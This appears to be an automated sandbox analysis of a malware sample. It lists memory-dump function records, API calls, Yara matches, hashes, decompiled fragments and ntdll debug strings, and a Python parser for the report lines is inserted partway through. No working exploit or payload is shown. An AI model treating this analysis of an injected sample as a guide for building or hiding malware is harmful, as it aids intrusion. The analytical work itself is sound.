                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 1aea52d67783b34136f5f8153b5cdd7d7c3f7677e4fafa57ae4fe63937737f62
                                                                    • Instruction ID: 3dc8ae6b21ff793fb9ccb4316c12a07183eb8a2a4ec78fbb2cfb5cdf3f300cc0
                                                                    • Opcode Fuzzy Hash: 1aea52d67783b34136f5f8153b5cdd7d7c3f7677e4fafa57ae4fe63937737f62
                                                                    • Instruction Fuzzy Hash: 6F90026138100013D1407199942860A4055F7E1341FD1D411E0404994CDD5588566262
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 61c0d9d8fa9a76b96e52e076d1e1ac3fa7a39fe1da90deecc4bd66ea691a17e6
                                                                    • Instruction ID: a717c3c7abdc42bba76e3cb58a2c97f4b88ac1915205b6b35548eb9ab5bf751b
                                                                    • Opcode Fuzzy Hash: 61c0d9d8fa9a76b96e52e076d1e1ac3fa7a39fe1da90deecc4bd66ea691a17e6
                                                                    • Instruction Fuzzy Hash: 3F90027128100812D1807199841464E0055B7D1341FD1C415A0015A94DCE558A5977E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9a4adce38273e507ede412059da1bcdecea37121967138013fecf5d79c5fcab0
                                                                    • Instruction ID: 5e126ffbc273526a2d6a31d1223d320a432f4b20fa3d65eae4bad7b60c269c8c
                                                                    • Opcode Fuzzy Hash: 9a4adce38273e507ede412059da1bcdecea37121967138013fecf5d79c5fcab0
                                                                    • Instruction Fuzzy Hash: 6090027128108812D1107199C41474E0055B7D0341FD5C811A4414A98DCAD588917161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                                    • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                                                                    • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                                    • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                                    				void* _t10;
                                                                    				void* _t15;
                                                                    
                                                                    				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34); // 0x004188d7
                                                                    				_t6 =  &_a8; // 0x413546                                                  // 0x004188e2
                                                                    				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed                     // 0x004188ed
                                                                    				return _t10;                                                               // 0x004188f1
                                                                    			}

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID: F5A
                                                                    • API String ID: 1279760036-683449296
                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                                    • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                                                    • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                                    • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: fcdc5623d7d4368ef8f841a9baa8722fcd9ba901bc83185bf29f41fe2183157f
                                                                    • Instruction ID: 4c9bc1d5122e729ebea0a90768cd22131df67a68825705a4834a12e48285c581
                                                                    • Opcode Fuzzy Hash: fcdc5623d7d4368ef8f841a9baa8722fcd9ba901bc83185bf29f41fe2183157f
                                                                    • Instruction Fuzzy Hash: 11E06DB12003196BD720DF89CC86EDB3769AF84650F018169FD0D6B242C931ED098BE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID:
                                                                    • API String ID: 3298025750-0
                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                    • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                    • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                    • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcess
                                                                    • String ID:
                                                                    • API String ID: 621844428-0
                                                                    • Opcode ID: afc656ac6491a0f145a87c0515414a0bbbd9975d3be51118ec40ae1f2bfbb04f
                                                                    • Instruction ID: 44ce480b178df4900dfd740dccc8e721f533594fb9d6c403b0dcbf16fef5d7df
                                                                    • Opcode Fuzzy Hash: afc656ac6491a0f145a87c0515414a0bbbd9975d3be51118ec40ae1f2bfbb04f
                                                                    • Instruction Fuzzy Hash: 6AE08635600604BBD730DF68CD89FD73B69AF04350F004158B919AB291C130E910CA90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 5263daaa3e79923232b5243a7ad5db127be6e05fe2279ba3f9f63705ca4be623
                                                                    • Instruction ID: 35cdd9e49f7997f2b2829b9fca70690eb3949dd8f430645db4a28516295ab8d0
                                                                    • Opcode Fuzzy Hash: 5263daaa3e79923232b5243a7ad5db127be6e05fe2279ba3f9f63705ca4be623
                                                                    • Instruction Fuzzy Hash: C3B09B719414C5D5DB11E7A5860871F795077D0745F56C455D1020A81B477CC091F5F6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
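The API reference lines above (for example `RtlAllocateHeap.NTDLL(...), ref: 004188ED`, which matches the call site in the decompiled E004188C0 listing, and `PostThreadMessageW.USER32(?,00000111,...)`, where 0x111 is WM_COMMAND) are easiest to correlate with a disassembler once they are turned into structured records keyed by call-site address and memory-dump base. The following parser is an added example written for this page; it is not part of the sandbox report or its tooling. Its input is a constructed sample built from lines of this report, the `•` bullet and `ref:` / `xrefs:` / `Offset:` layout are assumed to be stable across entries, and the `rva` property assumes the reported `Offset` is the base at which the dump was mapped.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: lines copied from the report entries above, reduced to
# the three line types this parser consumes (API refs, string xrefs, dump source).
SAMPLE = """\
APIs
• RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
Memory Dump Source
• Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
Memory Dump Source
• Source File: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Strings
• a NULL pointer, xrefs: 0160B4E0
• <unknown>, xrefs: 0160B27E, 0160B2D1, 0160B350
Memory Dump Source
• Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
"""

# Assumed line layouts (taken from the entries on this page).
API_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(
    r"^•\s*Source File:\s*(?P<pid>\d+)\.\d+\.\d+\.[0-9A-Fa-f]+\.[^,]*,\s*Offset:\s*(?P<off>[0-9A-Fa-f]+)")
XREF_MARK = ", xrefs: "

# Window message ids worth naming when they appear as a PostThreadMessageW argument.
WINDOW_MESSAGES = {0x0111: "WM_COMMAND"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple                       # int per argument; None where the report prints '?'
    ref: int                          # virtual address of the call site
    pid: Optional[int] = None         # process id taken from the dump file name
    dump_base: Optional[int] = None   # 'Offset' of the dump the call was found in

    @property
    def rva(self) -> Optional[int]:
        # Call-site offset relative to the dump base, for a disassembler loaded at another base.
        return None if self.dump_base is None else self.ref - self.dump_base

    def label(self) -> str:
        s = f"{self.module}!{self.name} @ {self.ref:08X}"
        if self.name == "PostThreadMessageW" and len(self.args) > 1 and self.args[1] in WINDOW_MESSAGES:
            s += f" (msg={WINDOW_MESSAGES[self.args[1]]})"
        return s


@dataclass
class StringRef:
    text: str
    xrefs: tuple                      # addresses that reference the string
    pid: Optional[int] = None
    dump_base: Optional[int] = None


def _arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok in ("?", "") else int(tok, 16)


def parse_report(text: str):
    """Return (api_calls, string_refs). Records are attached to the next
    'Source File' line, because the report prints the dump after its items."""
    calls, strings, pending = [], [], []
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            args = tuple(_arg(t) for t in m["args"].split(",")) if m["args"] else ()
            pending.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16)))
            continue
        if line.startswith("•") and XREF_MARK in line:
            s, xs = line[1:].strip().rsplit(XREF_MARK, 1)   # rsplit: the string itself may contain commas
            pending.append(StringRef(s, tuple(int(x.strip(), 16) for x in xs.split(","))))
            continue
        m = SRC_RE.match(line)
        if m:
            for rec in pending:
                rec.pid = int(m["pid"])
                rec.dump_base = int(m["off"], 16)
                (calls if isinstance(rec, ApiCall) else strings).append(rec)
            pending.clear()
    return calls, strings


def calls_by_module(calls) -> dict:
    out = {}
    for c in calls:
        out.setdefault(c.module, []).append(c.name)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    api_calls, string_refs = parse_report(SAMPLE)
    for c in api_calls:
        print(f"{c.label()}  pid={c.pid} base={c.dump_base:08X} rva={c.rva:X}")
    for s in string_refs:
        print(f"{s.text!r} base={s.dump_base:08X} xrefs={[hex(x) for x in s.xrefs]}")
```

Records are keyed by the dump base as well as the address because the report mixes two dumps of the same process (base 00400000, the injected payload image, and base 01530000); an address such as 0160B4E0 only makes sense against the second one.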

                                                                    Non-executed Functions

                                                                    Strings
                                                                    • a NULL pointer, xrefs: 0160B4E0
                                                                    • *** enter .cxr %p for the context, xrefs: 0160B50D
                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0160B305
                                                                    • The resource is owned shared by %d threads, xrefs: 0160B37E
                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0160B38F
                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0160B53F
                                                                    • <unknown>, xrefs: 0160B27E, 0160B2D1, 0160B350, 0160B399, 0160B417, 0160B48E
                                                                    • *** Inpage error in %ws:%s, xrefs: 0160B418
                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0160B484
                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0160B39B
                                                                    • The critical section is owned by thread %p., xrefs: 0160B3B9
                                                                    • read from, xrefs: 0160B4AD, 0160B4B2
                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0160B2DC
                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 0160B48F
                                                                    • *** then kb to get the faulting stack, xrefs: 0160B51C
                                                                    • an invalid address, %p, xrefs: 0160B4CF
                                                                    • This failed because of error %Ix., xrefs: 0160B446
                                                                    • *** enter .exr %p for the exception record, xrefs: 0160B4F1
                                                                    • Go determine why that thread has not released the critical section., xrefs: 0160B3C5
                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0160B323
                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0160B314
                                                                    • The instruction at %p tried to %s , xrefs: 0160B4B6
                                                                    • The resource is owned exclusively by thread %p, xrefs: 0160B374
                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 0160B352
                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0160B476
                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0160B3D6
                                                                    • write to, xrefs: 0160B4A6
                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0160B47D
                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0160B2F3
                                                                    • The instruction at %p referenced memory at %p., xrefs: 0160B432
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                    • API String ID: 0-108210295
                                                                    • Opcode ID: 81ceb894f26e0b4b9e47d93d4c09bf56e721688da0937ff747b2d7a588c68f42
                                                                    • Instruction ID: cf8fa18e2ab94cfd194637f35dc24dc63ba0ad637729341162810a323bebdff7
                                                                    • Opcode Fuzzy Hash: 81ceb894f26e0b4b9e47d93d4c09bf56e721688da0937ff747b2d7a588c68f42
                                                                    • Instruction Fuzzy Hash: CF81067DA80201FFDB2E9A4ACC49D6F3B75FFA6699F418048F5041F292E3758511CA71
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 44%
                                                                    			E01611C06() {
                                                                    				signed int _t27;
                                                                    				char* _t104;
                                                                    				char* _t105;
                                                                    				intOrPtr _t113;
                                                                    				intOrPtr _t115;
                                                                    				intOrPtr _t117;
                                                                    				intOrPtr _t119;
                                                                    				intOrPtr _t120;
                                                                    
                                                                    				_t105 = 0x15348a4;
                                                                    				_t104 = "HEAP: ";
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    					_push(_t104);
                                                                    					E0155B150();
                                                                    				} else {
                                                                    					E0155B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    				}
                                                                    				_push( *0x164589c);
                                                                    				E0155B150("Heap error detected at %p (heap handle %p)\n",  *0x16458a0);
                                                                    				_t27 =  *0x1645898; // 0x0
                                                                    				if(_t27 <= 0xf) {
                                                                    					switch( *((intOrPtr*)(_t27 * 4 +  &M01611E96))) {
                                                                    						case 0:
                                                                    							_t105 = "heap_failure_internal";
                                                                    							goto L21;
                                                                    						case 1:
                                                                    							goto L21;
                                                                    						case 2:
                                                                    							goto L21;
                                                                    						case 3:
                                                                    							goto L21;
                                                                    						case 4:
                                                                    							goto L21;
                                                                    						case 5:
                                                                    							goto L21;
                                                                    						case 6:
                                                                    							goto L21;
                                                                    						case 7:
                                                                    							goto L21;
                                                                    						case 8:
                                                                    							goto L21;
                                                                    						case 9:
                                                                    							goto L21;
                                                                    						case 0xa:
                                                                    							goto L21;
                                                                    						case 0xb:
                                                                    							goto L21;
                                                                    						case 0xc:
                                                                    							goto L21;
                                                                    						case 0xd:
                                                                    							goto L21;
                                                                    						case 0xe:
                                                                    							goto L21;
                                                                    						case 0xf:
                                                                    							goto L21;
                                                                    					}
                                                                    				}
                                                                    				L21:
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    					_push(_t104);
                                                                    					E0155B150();
                                                                    				} else {
                                                                    					E0155B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    				}
                                                                    				_push(_t105);
                                                                    				E0155B150("Error code: %d - %s\n",  *0x1645898);
                                                                    				_t113 =  *0x16458a4; // 0x0
                                                                    				if(_t113 != 0) {
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0155B150();
                                                                    					} else {
                                                                    						E0155B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0155B150("Parameter1: %p\n",  *0x16458a4);
                                                                    				}
                                                                    				_t115 =  *0x16458a8; // 0x0
                                                                    				if(_t115 != 0) {
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0155B150();
                                                                    					} else {
                                                                    						E0155B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0155B150("Parameter2: %p\n",  *0x16458a8);
                                                                    				}
                                                                    				_t117 =  *0x16458ac; // 0x0
                                                                    				if(_t117 != 0) {
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0155B150();
                                                                    					} else {
                                                                    						E0155B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					E0155B150("Parameter3: %p\n",  *0x16458ac);
                                                                    				}
                                                                    				_t119 =  *0x16458b0; // 0x0
                                                                    				if(_t119 != 0) {
                                                                    					L41:
                                                                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    						_push(_t104);
                                                                    						E0155B150();
                                                                    					} else {
                                                                    						E0155B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    					}
                                                                    					_push( *0x16458b4);
                                                                    					E0155B150("Last known valid blocks: before - %p, after - %p\n",  *0x16458b0);
                                                                    				} else {
                                                                    					_t120 =  *0x16458b4; // 0x0
                                                                    					if(_t120 != 0) {
                                                                    						goto L41;
                                                                    					}
                                                                    				}
                                                                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                    					_push(_t104);
                                                                    					E0155B150();
                                                                    				} else {
                                                                    					E0155B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                    				}
                                                                    				return E0155B150("Stack trace available at %p\n", 0x16458c0);
                                                                    			}


                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                    • API String ID: 0-2897834094
                                                                    • Opcode ID: 7fec374c154c5db9b7faefaba5572d979c5e9939d8358794342703def58a1c43
                                                                    • Instruction ID: 99de4b2d25ed10cf569b87824b56a0a118cad5cd668334e619433c38cac95912
                                                                    • Opcode Fuzzy Hash: 7fec374c154c5db9b7faefaba5572d979c5e9939d8358794342703def58a1c43
                                                                    • Instruction Fuzzy Hash: EE610037950146DFD791ABB9DC9AD2473E1FB41920F0E802EFA0A5F344DA388D428F5A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • Kernel-MUI-Language-Allowed, xrefs: 01563DC0
                                                                    • Kernel-MUI-Number-Allowed, xrefs: 01563D8C
                                                                    • WindowsExcludedProcs, xrefs: 01563D6F
                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 01563E97
                                                                    • Kernel-MUI-Language-SKU, xrefs: 01563F70
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                    • API String ID: 0-258546922
                                                                    • Opcode ID: a0b178b9e146e64be968e938a2f0d9942d327487c8327abed912889514455f12
                                                                    • Instruction ID: be03fa229676afac0e8fbc8d7ebb32f5c7ddc659be7a5051b4cc5d123626108d
                                                                    • Opcode Fuzzy Hash: a0b178b9e146e64be968e938a2f0d9942d327487c8327abed912889514455f12
                                                                    • Instruction Fuzzy Hash: 59F11B72D0061AEFDF11DF98D980AEEBBBDFF58650F15046AE505AB250E7349E01CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 015C932A
                                                                    • LdrpFindDllActivationContext, xrefs: 015C9331, 015C935D
                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 015C9357
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 015C933B, 015C9367
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 0-3779518884
                                                                    • Opcode ID: 21b0abeda0941aeff4352463c5c395de11b8345f4595731eb7675d789436e3d4
                                                                    • Instruction ID: cd242dfc0b8dbf8f55ef0291bb959337c1b7498087568bff2b3b87b751289ed6
                                                                    • Opcode Fuzzy Hash: 21b0abeda0941aeff4352463c5c395de11b8345f4595731eb7675d789436e3d4
                                                                    • Instruction Fuzzy Hash: 3B41E422A007199FEB36BA5C8C49B3DB7A5FB44744F854569E9047F1D1E760AD808391
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 015B9C18
                                                                    • LdrpDoPostSnapWork, xrefs: 015B9C1E
                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 015B9C28
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, Offset: 01530000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                    • API String ID: 2994545307-1948996284
                                                                    • Opcode ID: 708794a274b77b7c3bd3fe8bc3733db4d3813bcd78371034b2a8a2801049d933
